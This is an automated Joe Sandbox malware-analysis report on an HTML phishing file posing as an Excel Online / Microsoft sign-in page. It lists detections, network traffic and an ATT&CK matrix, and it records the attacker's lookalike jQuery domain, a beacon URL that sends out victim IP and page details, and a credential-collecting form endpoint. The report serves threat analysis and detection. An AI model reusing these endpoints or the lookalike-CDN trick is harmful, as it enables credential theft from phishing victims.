Edit tour

Windows Analysis Report
aaaaa.shtml.html

Overview

General Information

Sample name:	aaaaa.shtml.html
Analysis ID:	1460267
MD5:	9c7d11e58fb52f06cbcd15912bb7a1b0
SHA1:	f2e7fa313cd79a1a3731be04210457495945e8a8
SHA256:	0d4b9f562d0c853d6aefee6fc8bf72355a8714df6f4ce669adcfdd46b285030d
Tags:	html
Infos:

Detection

HTMLPhisher

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Yara detected HtmlPhish10

Detected javascript redirector / loader

HTML document with suspicious title

HTML file submission containing password form

Phishing site detected (based on logo match)

Detected hidden input values containing email addresses (often used in phishing pages)

Detected non-DNS traffic on DNS port

HTML body contains low number of good links

HTML body contains password input but no form action

HTML title does not match URL

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

None HTTPS page querying sensitive user data (password, username or email)

Stores files to the Windows start menu directory

Classification

Process Tree

System is w10x64

chrome.exe (PID: 6012 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\aaaaa.shtml.html" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)

chrome.exe (PID: 3464 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1960,i,11415482237195568552,12706439463585877123,262144 /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
aaaaa.shtml.html	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

HTML

Source	Rule	Description	Author	Strings
0.0.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
0.1.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8Content-Length: 1Connection: closeDate: Thu, 20 Jun 2024 16:14:13 GMTx-envoy-response-flags: -Server: Clearbitstrict-transport-security: max-age=63072000; includeSubDomains; preloadx-content-type-options: nosniffX-Cache: Error from cloudfrontVia: 1.1 e71625290a8b18b90edbfcbc81303596.cloudfront.net (CloudFront)X-Amz-Cf-Pop: AMS58-P2X-Amz-Cf-Id: g2qoh9ANNLRVz4GExClciebBfKYkY-ocnBAl3K5BjQnKHcL7z68LVw==

Source: chromecache_100.3.dr	String found in binary or memory: http://ianlunn.co.uk/
Source: chromecache_100.3.dr	String found in binary or memory: http://ianlunn.github.io/Hover/)
Source: aaaaa.shtml.html	String found in binary or memory: https://code.jquery.com.de/jquery-3.5.1.min.js
Source: chromecache_99.3.dr	String found in binary or memory: https://getbootstrap.com)
Source: chromecache_100.3.dr	String found in binary or memory: https://github.com/IanLunn/Hover
Source: chromecache_99.3.dr	String found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
Source: aaaaa.shtml.html	String found in binary or memory: https://logo.clearbit.com/
Source: aaaaa.shtml.html	String found in binary or memory: https://logo.clearbit.com/office.com
Source: aaaaa.shtml.html	String found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css
Source: aaaaa.shtml.html	String found in binary or memory: https://nocodeform.io/f/6656f3e5cd557f87fe213b8c
Source: aaaaa.shtml.html	String found in binary or memory: https://ucarecdn.com/eae24034-0cc9-4528-827a-d46e30dd5a83/hover.css

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 55238 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55238
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55239
Source: unknown	Network traffic detected: HTTP traffic on port 55240 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55242 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55242
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55240
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 55239 -> 443

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.10:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.10:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.10:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 173.222.162.55:443 -> 192.168.2.10:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.10:55238 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.10:55239 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.10:55240 version: TLS 1.2

Source: classification engine

Classification label: mal88.phis.winHTML@30/18@16/10

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Jump to behavior

Source: aaaaa.shtml.html

ReversingLabs: Detection: 28%

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\aaaaa.shtml.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1960,i,11415482237195568552,12706439463585877123,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1960,i,11415482237195568552,12706439463585877123,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Google Drive.lnk.1.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.1.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.1.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.1.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.1.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.1.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Stealing of Sensitive Information

HTML file submission containing password form

Source: file:///C:/Users/user/Desktop/aaaaa.shtml.html

HTTP Parser: file:///C:/Users/user/Desktop/aaaaa.shtml.html

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
aaaaa.shtml.html	29%	ReversingLabs	Document-HTML.Trojan.OLookPhish

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://ipinfo.io/	0%	URL Reputation	safe
https://code.jquery.com.de/ip.php	100%	Avira URL Cloud	malware
https://github.com/twbs/bootstrap/blob/master/LICENSE)	0%	Avira URL Cloud	safe
https://getbootstrap.com)	0%	Avira URL Cloud	safe
https://ucarecdn.com/eae24034-0cc9-4528-827a-d46e30dd5a83/hover.css	0%	Avira URL Cloud	safe
file:///C:/Users/user/Desktop/aaaaa.shtml.html	0%	Avira URL Cloud	safe
https://github.com/IanLunn/Hover	0%	Avira URL Cloud	safe
https://logo.clearbit.com/ispol.com.pl	0%	Avira URL Cloud	safe
http://ianlunn.co.uk/	0%	Avira URL Cloud	safe
http://ianlunn.github.io/Hover/)	0%	Avira URL Cloud	safe
https://code.jquery.com.de/jquery-3.5.1.min.js	100%	Avira URL Cloud	malware
https://logo.clearbit.com/	0%	Avira URL Cloud	safe
https://nocodeform.io/f/6656f3e5cd557f87fe213b8c	0%	Avira URL Cloud	safe
https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css	0%	Avira URL Cloud	safe
https://code.jquery.com.de/post/index.php?title=Excel%20Online%20Spreadsheet%20::%20Sign%20in&link=file:///C:/Users/user/Desktop/aaaaa.shtml.html&time=2024-6-20%2012:14:14&ip=8.46.123.33%20:%20United%20States	100%	Avira URL Cloud	malware
https://logo.clearbit.com/office.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
d26p066pn2w0s0.cloudfront.net	18.239.36.50	true	false	unknown
maxcdn.bootstrapcdn.com	104.18.11.207	true	false	unknown
www.google.com	142.250.185.132	true	false	unknown
code.jquery.com.de	38.34.185.163	true	false	unknown
ucarecdn.com	2.16.164.82	true	false	unknown
logo.clearbit.com	unknown	unknown	false	unknown
171.39.242.20.in-addr.arpa	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
file:///C:/Users/user/Desktop/aaaaa.shtml.html	true	Avira URL Cloud: safe	unknown
https://ipinfo.io/	false	URL Reputation: safe	unknown
https://code.jquery.com.de/jquery-3.5.1.min.js	false	Avira URL Cloud: malware	unknown
https://code.jquery.com.de/ip.php	false	Avira URL Cloud: malware	unknown
https://ucarecdn.com/eae24034-0cc9-4528-827a-d46e30dd5a83/hover.css	false	Avira URL Cloud: safe	unknown
https://logo.clearbit.com/ispol.com.pl	false	Avira URL Cloud: safe	unknown
https://logo.clearbit.com/office.com	false	Avira URL Cloud: safe	unknown
https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css	false	Avira URL Cloud: safe	unknown
https://code.jquery.com.de/post/index.php?title=Excel%20Online%20Spreadsheet%20::%20Sign%20in&link=file:///C:/Users/user/Desktop/aaaaa.shtml.html&time=2024-6-20%2012:14:14&ip=8.46.123.33%20:%20United%20States	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ianlunn.github.io/Hover/)	chromecache_100.3.dr	false	Avira URL Cloud: safe	unknown
https://getbootstrap.com)	chromecache_99.3.dr	false	Avira URL Cloud: safe	unknown
http://ianlunn.co.uk/	chromecache_100.3.dr	false	Avira URL Cloud: safe	unknown
https://github.com/twbs/bootstrap/blob/master/LICENSE)	chromecache_99.3.dr	false	Avira URL Cloud: safe	unknown
https://github.com/IanLunn/Hover	chromecache_100.3.dr	false	Avira URL Cloud: safe	unknown
https://logo.clearbit.com/	aaaaa.shtml.html	false	Avira URL Cloud: safe	unknown
https://nocodeform.io/f/6656f3e5cd557f87fe213b8c	aaaaa.shtml.html	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
2.16.164.82	ucarecdn.com	European Union	20940	AKAMAI-ASN1EU	false
38.34.185.163	code.jquery.com.de	United States	174	COGENT-174US	false
142.250.185.132	www.google.com	United States	15169	GOOGLEUS	false
18.239.36.13	unknown	United States	16509	AMAZON-02US	false
216.58.206.68	unknown	United States	15169	GOOGLEUS	false
104.18.11.207	maxcdn.bootstrapcdn.com	United States	13335	CLOUDFLARENETUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
18.239.36.50	d26p066pn2w0s0.cloudfront.net	United States	16509	AMAZON-02US	false

Private

IP
192.168.2.16
192.168.2.10

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1460267
Start date and time:	2024-06-20 18:13:11 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowshtmlcookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	aaaaa.shtml.html
Detection:	MAL
Classification:	mal88.phis.winHTML@30/18@16/10
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .html

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 216.58.206.67, 142.250.186.174, 142.250.110.84, 34.104.35.123, 142.250.186.106, 216.58.206.74, 216.58.206.42, 142.250.185.138, 142.250.186.170, 172.217.16.202, 142.250.185.170, 142.250.184.234, 142.250.185.202, 142.250.186.74, 142.250.185.106, 172.217.18.106, 142.250.185.234, 142.250.185.74, 216.58.212.170, 142.250.74.202, 2.19.126.154, 52.165.164.15, 20.242.39.171, 142.250.185.110, 142.250.185.174
Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, glb.cws.prod.dcat.dsp.trafficmanager.net, update.googleapis.com, clients.l.google.com, optimizationguide-pa.googleapis.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: aaaaa.shtml.html

Simulations

Behavior and APIs

⊘No simulations

LLM Input / Output

Input	Output
URL: file:///C:/Users/user/Desktop/aaaaa.shtml.html Model: gpt-4o	```json{ "phishing_score": 9, "brands": "Microsoft Excel", "phishing": true, "suspicious_domain": true, "has_loginform": true, "has_captcha": false, "setechniques": true, "has_suspicious_link": true, "legitmate_domain": "office.com", "reasons": "The URL 'file:///C:/Users/user/Desktop/aaaaa.shtml.html' is a local file path, not a legitimate web domain, which is highly suspicious. The page mimics Microsoft Excel Online, a service provided by Microsoft, whose legitimate domain is 'office.com'. The presence of a login form asking for an email password is a common phishing technique. The 'Download Document' button is another suspicious element as it could lead to malicious downloads. The combination of these factors strongly indicates that this is a phishing site."}

URL: file:///C:/Users/user/Desktop/aaaaa.shtml.html Model: gpt-4o	```json{ "phishing_score": 9, "brands": "Microsoft", "phishing": true, "suspicious_domain": true, "has_loginform": true, "has_captcha": false, "setechniques": true, "has_suspicious_link": true, "legitmate_domain": "microsoft.com", "reasons": "The URL 'file:///C:/Users/user/Desktop/aaaaa.shtml.html' is a local file path, which is highly suspicious for a legitimate web page. The page mimics Microsoft Excel Online, a service provided by Microsoft, but the URL does not match the legitimate domain 'microsoft.com'. The presence of a login form asking for an email password is a common phishing technique. The page also uses social engineering techniques by presenting a familiar brand interface to mislead users. The combination of these factors strongly indicates that this is a phishing site."}

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.18.11.207	http://googlle.com	Get hash	malicious	Unknown	Browse	maxcdn.bootstrapcdn.com/font-awesome/4.1.0/fonts/fontawesome-webfont.woff?v=4.1.0
	https://city-of-goodyear.webnode.page/	Get hash	malicious	Unknown	Browse	maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap-theme.min.css
	http://Voyages.CNTraveler.com	Get hash	malicious	Unknown	Browse	maxcdn.bootstrapcdn.com/font-awesome/4.3.0/fonts/fontawesome-webfont.woff2?v=4.3.0
	http://185.67.82.114	Get hash	malicious	Unknown	Browse	maxcdn.bootstrapcdn.com/bootstrap/3.2.0/js/bootstrap.min.js
	SecuriteInfo.com.Exploit.Siggen3.17149.4489.xls	Get hash	malicious	Unknown	Browse	netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
	SecuriteInfo.com.Exploit.Siggen3.17149.3543.xls	Get hash	malicious	Unknown	Browse	netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
	SecuriteInfo.com.Exploit.Siggen3.17149.3543.xls	Get hash	malicious	Unknown	Browse	netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
	SecuriteInfo.com.Exploit.Siggen3.17149.24514.xls	Get hash	malicious	Unknown	Browse	netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
	SecuriteInfo.com.Exploit.Siggen3.17149.12724.xls	Get hash	malicious	Unknown	Browse	netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
	SecuriteInfo.com.Exploit.Siggen3.17149.8245.xls	Get hash	malicious	Unknown	Browse	netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
239.255.255.250	https://airtable.com/appLxB5sOmdo2GJo9/shrh1CoBQsbhadVcV	Get hash	malicious	HTMLPhisher	Browse
	OFS Fitel, LLC In-Service Agreement.doc	Get hash	malicious	Unknown	Browse
	ACH Receipt.html	Get hash	malicious	HTMLPhisher	Browse
	https://docs.google.com/drawings/d/1qLrBv5e6nFXfFVtMDNkicLQy_velV_hePF-fb4qRTSc/preview	Get hash	malicious	Unknown	Browse
	http://www.absoluteperfection.co.uk	Get hash	malicious	Unknown	Browse
	https://link.mail.beehiiv.com/ss/c/u001.7fHwObg5vVyVWvL0XjuYab-fyGtR7ObT67BDVhUgvAxP6uAUVbKK3L1COuezszwXayDkz260QMkrdPC1htw3t_5QRxG8W1etpOoCjxpnTJGXzPf3j8BuqczIRafVz2-o3qRunciZcXpCaqRfMg3DrXAbIXYJXtcwpFCWMwkPsBA/477/gYfATSQUQlWduKXI1eEKgQ/h6/h001.s5I972gJe9AXwSBmdFGe7q9GgXfXPDzuKhKqj7sTfRo	Get hash	malicious	HTMLPhisher	Browse
	https://link.mail.beehiiv.com/ss/c/u001.7fHwObg5vVyVWvL0XjuYab-fyGtR7ObT67BDVhUgvAxP6uAUVbKK3L1COuezszwXayDkz260QMkrdPC1htw3t_5QRxG8W1etpOoCjxpnTJGXzPf3j8BuqczIRafVz2-o3qRunciZcXpCaqRfMg3DrXAbIXYJXtcwpFCWMwkPsBA/477/gYfATSQUQlWduKXI1eEKgQ/h6/h001.s5I972gJe9AXwSBmdFGe7q9GgXfXPDzuKhKqj7sTfRo	Get hash	malicious	HTMLPhisher	Browse
	https://api.virtru.com/accounts/email-activation?linkId=6a354426-d14b-461c-9068-d631a3772906-99eaadf1-1535-4926-b117-94d72b1cdf72&loginRedirectUrl=https://jpmchase.secure.virtru.com/secure-reader&userId=supplies@stinsons.com&senderEmail=noreplies.sua@jpmchase.com&c=E,1,GJLSrPtvth0tvKAsk9Y8SirlbwhoEVEruSrOswYM_LloAIiVFwyhuRHy64qpEnuVb816Gf3-lgJ8eHDKwE1BYzbKlN_iUmGn6C8RtrX3Te-ZHW3l4Q,,&typo=1	Get hash	malicious	Unknown	Browse
	https://www.microsoft.com/	Get hash	malicious	Unknown	Browse
	https://docs.google.com/forms/d/e/1FAIpQLSf-odKEE82LEOujINKAwbtXy190-Zzj1nnrlcpbdgq3dZ28zg/viewform?usp=pp_url	Get hash	malicious	Unknown	Browse
18.239.36.50	http://url9477.mailshopline.com/ls/click?upn=u001.dKss8ygwoZOtCAClFWS2NC7c-2F7GT3pGZhuGltE3-2FW2SliLd2RrMv-2FyRrT4zNYXfqAlO-_8OjzPME1TlLA0bsv1p5WplUFTztXBt9-2BT7rurxmnOurQH1fyveJdQq-2FVZmgR1f-2BMhWMoXWpRRr6H83ChvVru06KPpRsV-2Br4taiKM-2BPP8uNJuBWQd-2F7l2SOdExBChabv91GHeCR9QxgdTr9NsfjwN0Wqf6I53DUIAZ5xtl64MSprQtL2L129idZQ44-2BvfWKpyM4inupXHEQuebgccv8gpxwvTJHK7egSexr1f7Ez1dBlmyG68Cp0KoQtviIo1DT5WHxzUdZdw4fDbvavLJO-2FqDT-2B6lEok0AT9OF0ZAgvedO4nNafX5y11rAkkaxIDDCzYlb9j6yKizVV3kzAXlrtEaekfkBhjPiknyiVlwCY-2FB-2BJz3OpnTvTpUGhZbq7AuJKKVygO5WKnpdjsF4m87YDKJAULNBKHhoFMcKzqZP9tGnk-3D	Get hash	malicious	Unknown	Browse
	http://pub-20346a63221f4f17b0dfd4183beda90b.r2.dev/5.html	Get hash	malicious	HTMLPhisher	Browse
	http://undenation.com/	Get hash	malicious	Unknown	Browse
	https://pub-b40b96293407402c9de8f73f112f9089.r2.dev/do.html	Get hash	malicious	HTMLPhisher	Browse
	https://litnet.com/out?signature=2c1f4fb3a510da55&verify=f0d85a74515d878f9714518b56f64f83c3d478981c8004fd8a36ff05f77ed04b&litnet=domain&url=https://cloudflare-ipfs.com/ipfs/QmbbUyKXzZMtLWL65JBbfeA8HRigpuDZ9sk5XT4xvfvyVx?filename=reqistrer-serversNonniiii.html#YXN0cmlkLnd1cnN0ZXJAaWxlZGVmcmFuY2UuZnI=	Get hash	malicious	HTMLPhisher	Browse
	http://mi.michaels.com/p/cp/d278335eb0e4f32c/c?mi_u=0b5077a2e65ed331ee5d2de857007cdfe1a618cd5fa2ea47fde9894ad456adce&mi_ecmp=Certificate_Reminder_T4&url=//sritulasifarmstays.in/wp#acctspayable@magmutual.com	Get hash	malicious	HTMLPhisher	Browse
